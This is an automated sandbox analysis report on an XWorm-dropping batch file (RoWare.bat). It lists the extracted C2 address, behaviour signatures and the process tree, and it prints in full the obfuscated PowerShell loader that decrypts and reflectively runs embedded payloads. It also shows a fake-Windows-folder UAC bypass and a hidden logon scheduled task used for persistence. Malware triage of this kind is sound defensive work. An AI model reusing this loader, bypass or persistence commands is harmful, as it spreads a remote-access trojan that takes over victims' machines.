Analysis
-
max time kernel
12s -
max time network
13s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
08-06-2024 22:02
Static task
static1
General
-
Target
RoWare.bat
-
Size
399KB
-
MD5
472de93de365167459958b7ce29f610e
-
SHA1
7a7ace619fbd8569c2982fb1fc44aa4b6040f351
-
SHA256
5baff04fad6153b7debb8003997edf677cd677263af4ab9e95510e225401ccde
-
SHA512
03fc1017200c386cbe36050f5014c644edd57864ba1f7b88e5ab497d616ba3ec658ee8d690efde5544fe3befe569f3365e4d64f3b276245967193527e3b17f6a
-
SSDEEP
6144:VvP2P1+j6+5esGiWZo9wvkjXD6P8NUd7XPDRwEMiF7i5qwJgK5EG/R7H4z:ZOtyEvi7dzNmdjl5F7g1ZK8VH2
Malware Config
Extracted
xworm
91.92.250.4:2709
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/732-96-0x00000204BF730000-0x00000204BF744000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 21 732 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 3984 powershell.exe 732 powershell.exe 3656 powershell.exe 1184 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
ComputerDefaults.exepid process 4544 ComputerDefaults.exe -
Loads dropped DLL 1 IoCs
Processes:
ComputerDefaults.exepid process 4544 ComputerDefaults.exe -
Drops file in System32 directory 2 IoCs
Processes:
svchost.exedescription ioc process File created C:\Windows\system32\SleepStudy\user-not-present-trace-2024-06-08-22-02-44.etl svchost.exe File opened for modification C:\Windows\system32\SleepStudy\user-not-present-trace-2024-06-08-22-02-44.etl svchost.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
svchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E1E99464E" svchost.exe -
Modifies registry class 13 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133623577550419911" svchost.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133623577648427669" svchost.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133623577632834548" svchost.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App svchost.exe Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI svchost.exe -
Suspicious behavior: EnumeratesProcesses 54 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3984 powershell.exe 3984 powershell.exe 732 powershell.exe 732 powershell.exe 3656 powershell.exe 3656 powershell.exe 4032 powershell.exe 4032 powershell.exe 4032 powershell.exe 1184 powershell.exe 1184 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 732 powershell.exe 3196 powershell.exe 3196 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3424 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3984 powershell.exe Token: SeDebugPrivilege 732 powershell.exe Token: SeDebugPrivilege 3656 powershell.exe Token: SeDebugPrivilege 4032 powershell.exe Token: SeIncreaseQuotaPrivilege 4032 powershell.exe Token: SeSecurityPrivilege 4032 powershell.exe Token: SeTakeOwnershipPrivilege 4032 powershell.exe Token: SeLoadDriverPrivilege 4032 powershell.exe Token: SeSystemProfilePrivilege 4032 powershell.exe Token: SeSystemtimePrivilege 4032 powershell.exe Token: SeProfSingleProcessPrivilege 4032 powershell.exe Token: SeIncBasePriorityPrivilege 4032 powershell.exe Token: SeCreatePagefilePrivilege 4032 powershell.exe Token: SeBackupPrivilege 4032 powershell.exe Token: SeRestorePrivilege 4032 powershell.exe Token: SeShutdownPrivilege 4032 powershell.exe Token: SeDebugPrivilege 4032 powershell.exe Token: SeSystemEnvironmentPrivilege 4032 powershell.exe Token: SeRemoteShutdownPrivilege 4032 powershell.exe Token: SeUndockPrivilege 4032 powershell.exe Token: SeManageVolumePrivilege 4032 powershell.exe Token: 33 4032 powershell.exe Token: 34 4032 powershell.exe Token: 35 4032 powershell.exe Token: 36 4032 powershell.exe Token: SeDebugPrivilege 1184 powershell.exe Token: SeIncreaseQuotaPrivilege 1184 powershell.exe Token: SeSecurityPrivilege 1184 powershell.exe Token: SeTakeOwnershipPrivilege 1184 powershell.exe Token: SeLoadDriverPrivilege 1184 powershell.exe Token: SeSystemProfilePrivilege 1184 powershell.exe Token: SeSystemtimePrivilege 1184 powershell.exe Token: SeProfSingleProcessPrivilege 1184 powershell.exe Token: SeIncBasePriorityPrivilege 1184 powershell.exe Token: SeCreatePagefilePrivilege 1184 powershell.exe Token: SeBackupPrivilege 1184 powershell.exe Token: SeRestorePrivilege 1184 powershell.exe Token: SeShutdownPrivilege 1184 powershell.exe Token: SeDebugPrivilege 1184 powershell.exe Token: SeSystemEnvironmentPrivilege 1184 powershell.exe Token: SeRemoteShutdownPrivilege 1184 powershell.exe Token: SeUndockPrivilege 1184 powershell.exe Token: SeManageVolumePrivilege 1184 powershell.exe Token: 33 1184 powershell.exe Token: 34 1184 powershell.exe Token: 35 1184 powershell.exe Token: 36 1184 powershell.exe Token: SeIncreaseQuotaPrivilege 1184 powershell.exe Token: SeSecurityPrivilege 1184 powershell.exe Token: SeTakeOwnershipPrivilege 1184 powershell.exe Token: SeLoadDriverPrivilege 1184 powershell.exe Token: SeSystemProfilePrivilege 1184 powershell.exe Token: SeSystemtimePrivilege 1184 powershell.exe Token: SeProfSingleProcessPrivilege 1184 powershell.exe Token: SeIncBasePriorityPrivilege 1184 powershell.exe Token: SeCreatePagefilePrivilege 1184 powershell.exe Token: SeBackupPrivilege 1184 powershell.exe Token: SeRestorePrivilege 1184 powershell.exe Token: SeShutdownPrivilege 1184 powershell.exe Token: SeDebugPrivilege 1184 powershell.exe Token: SeSystemEnvironmentPrivilege 1184 powershell.exe Token: SeRemoteShutdownPrivilege 1184 powershell.exe Token: SeUndockPrivilege 1184 powershell.exe Token: SeManageVolumePrivilege 1184 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.execmd.exeComputerDefaults.execmd.exepowershell.exedescription pid process target process PID 1676 wrote to memory of 2152 1676 cmd.exe cmd.exe PID 1676 wrote to memory of 2152 1676 cmd.exe cmd.exe PID 1676 wrote to memory of 884 1676 cmd.exe cmd.exe PID 1676 wrote to memory of 884 1676 cmd.exe cmd.exe PID 1676 wrote to memory of 3984 1676 cmd.exe powershell.exe PID 1676 wrote to memory of 3984 1676 cmd.exe powershell.exe PID 3984 wrote to memory of 5032 3984 powershell.exe cmd.exe PID 3984 wrote to memory of 5032 3984 powershell.exe cmd.exe PID 5032 wrote to memory of 4544 5032 cmd.exe ComputerDefaults.exe PID 5032 wrote to memory of 4544 5032 cmd.exe ComputerDefaults.exe PID 4544 wrote to memory of 2332 4544 ComputerDefaults.exe cmd.exe PID 4544 wrote to memory of 2332 4544 ComputerDefaults.exe cmd.exe PID 2332 wrote to memory of 3356 2332 cmd.exe cmd.exe PID 2332 wrote to memory of 3356 2332 cmd.exe cmd.exe PID 2332 wrote to memory of 2220 2332 cmd.exe cmd.exe PID 2332 wrote to memory of 2220 2332 cmd.exe cmd.exe PID 2332 wrote to memory of 732 2332 cmd.exe powershell.exe PID 2332 wrote to memory of 732 2332 cmd.exe powershell.exe PID 732 wrote to memory of 3656 732 powershell.exe powershell.exe PID 732 wrote to memory of 3656 732 powershell.exe powershell.exe PID 732 wrote to memory of 4032 732 powershell.exe powershell.exe PID 732 wrote to memory of 4032 732 powershell.exe powershell.exe PID 732 wrote to memory of 1184 732 powershell.exe powershell.exe PID 732 wrote to memory of 1184 732 powershell.exe powershell.exe PID 732 wrote to memory of 3424 732 powershell.exe Explorer.EXE PID 732 wrote to memory of 784 732 powershell.exe svchost.exe PID 732 wrote to memory of 3344 732 powershell.exe svchost.exe PID 732 wrote to memory of 1964 732 powershell.exe svchost.exe PID 732 wrote to memory of 4872 732 powershell.exe svchost.exe PID 732 wrote to memory of 1160 732 powershell.exe svchost.exe PID 732 wrote to memory of 1744 732 powershell.exe svchost.exe PID 732 wrote to memory of 2652 732 powershell.exe svchost.exe PID 732 wrote to memory of 1148 732 powershell.exe svchost.exe PID 732 wrote to memory of 948 732 powershell.exe svchost.exe PID 732 wrote to memory of 944 732 powershell.exe svchost.exe PID 732 wrote to memory of 1140 732 powershell.exe svchost.exe PID 732 wrote to memory of 1332 732 powershell.exe svchost.exe PID 732 wrote to memory of 1132 732 powershell.exe svchost.exe PID 732 wrote to memory of 736 732 powershell.exe svchost.exe PID 732 wrote to memory of 4896 732 powershell.exe svchost.exe PID 732 wrote to memory of 1716 732 powershell.exe svchost.exe PID 732 wrote to memory of 2492 732 powershell.exe svchost.exe PID 732 wrote to memory of 1900 732 powershell.exe svchost.exe PID 732 wrote to memory of 1308 732 powershell.exe svchost.exe PID 732 wrote to memory of 4652 732 powershell.exe svchost.exe PID 732 wrote to memory of 1892 732 powershell.exe svchost.exe PID 732 wrote to memory of 904 732 powershell.exe svchost.exe PID 732 wrote to memory of 1192 732 powershell.exe svchost.exe PID 732 wrote to memory of 1880 732 powershell.exe svchost.exe PID 732 wrote to memory of 2076 732 powershell.exe svchost.exe PID 732 wrote to memory of 2268 732 powershell.exe svchost.exe PID 732 wrote to memory of 2068 732 powershell.exe svchost.exe PID 732 wrote to memory of 1276 732 powershell.exe svchost.exe PID 732 wrote to memory of 2256 732 powershell.exe svchost.exe PID 732 wrote to memory of 2244 732 powershell.exe svchost.exe PID 732 wrote to memory of 1048 732 powershell.exe svchost.exe PID 732 wrote to memory of 1640 732 powershell.exe svchost.exe PID 732 wrote to memory of 2624 732 powershell.exe svchost.exe PID 732 wrote to memory of 1832 732 powershell.exe svchost.exe PID 732 wrote to memory of 1432 732 powershell.exe svchost.exe PID 732 wrote to memory of 2612 732 powershell.exe svchost.exe PID 732 wrote to memory of 1576 732 powershell.exe svchost.exe PID 732 wrote to memory of 2404 732 powershell.exe svchost.exe PID 732 wrote to memory of 1416 732 powershell.exe svchost.exe
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca2⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RoWare.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jiNE3E2FLDv+NKiKFH8uo69QT6nLdIqdGCpMMEmvmwY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2SAi3wOvnkUFLRYxrM1Aug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bjuhq=New-Object System.IO.MemoryStream(,$param_var); $lHqpc=New-Object System.IO.MemoryStream; $ZhWoP=New-Object System.IO.Compression.GZipStream($bjuhq, [IO.Compression.CompressionMode]::Decompress); $ZhWoP.CopyTo($lHqpc); $ZhWoP.Dispose(); $bjuhq.Dispose(); $lHqpc.Dispose(); $lHqpc.ToArray();}function execute_function($param_var,$param2_var){ $DjkcC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tpQof=$DjkcC.EntryPoint; $tpQof.Invoke($null, $param2_var);}$adpqO = 'C:\Users\Admin\AppData\Local\Temp\RoWare.bat';$host.UI.RawUI.WindowTitle = $adpqO;$cSfZG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($adpqO).Split([Environment]::NewLine);foreach ($zHjor in $cSfZG) { if ($zHjor.StartsWith('dxmcSvpkIMoaFKFAdSEr')) { $kULPw=$zHjor.Substring(20); break; }}$payloads_var=[string[]]$kULPw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c call SC.cmd6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jiNE3E2FLDv+NKiKFH8uo69QT6nLdIqdGCpMMEmvmwY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2SAi3wOvnkUFLRYxrM1Aug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bjuhq=New-Object System.IO.MemoryStream(,$param_var); $lHqpc=New-Object System.IO.MemoryStream; $ZhWoP=New-Object System.IO.Compression.GZipStream($bjuhq, [IO.Compression.CompressionMode]::Decompress); $ZhWoP.CopyTo($lHqpc); $ZhWoP.Dispose(); $bjuhq.Dispose(); $lHqpc.Dispose(); $lHqpc.ToArray();}function execute_function($param_var,$param2_var){ $DjkcC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tpQof=$DjkcC.EntryPoint; $tpQof.Invoke($null, $param2_var);}$adpqO = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $adpqO;$cSfZG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($adpqO).Split([Environment]::NewLine);foreach ($zHjor in $cSfZG) { if ($zHjor.StartsWith('dxmcSvpkIMoaFKFAdSEr')) { $kULPw=$zHjor.Substring(20); break; }}$payloads_var=[string[]]$kULPw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\RoWare')4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD581b640502b0c25ab216c6b6ad82ba7bd
SHA11b43e1fead8428aee3b764bcacc3795021277be9
SHA2564cf92d978f2a1fc5b80eda8a11f181603018d270fc8fe24daa634b954c75380f
SHA512842cfba04ddbd5336e16dbc1ab8e57a80541f0ab1da6260fcca53f7f441e4b1c4149bce2d74b23684a338a86aded2626008f33edb246871e178bda1272c8fa57
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f3b2f7c8e9b3057a4342efce5cb1f648
SHA1cbcab1b48cd397259c504d2c915c5c30ea877b06
SHA2562c3dc036ac8d51e14510a0a6bba650d29e55c394b3b564a5f762c2fc1ebc3693
SHA512f627a062084919835cdfadcaa06849d6a636e4b2f6a24317c29e78183c02b4e2ffa9cf0911f627efc2143514695a1b3e70141866f61c722039721182cd5fb142
-
C:\Users\Admin\AppData\Local\Temp\SC.cmdFilesize
399KB
MD5472de93de365167459958b7ce29f610e
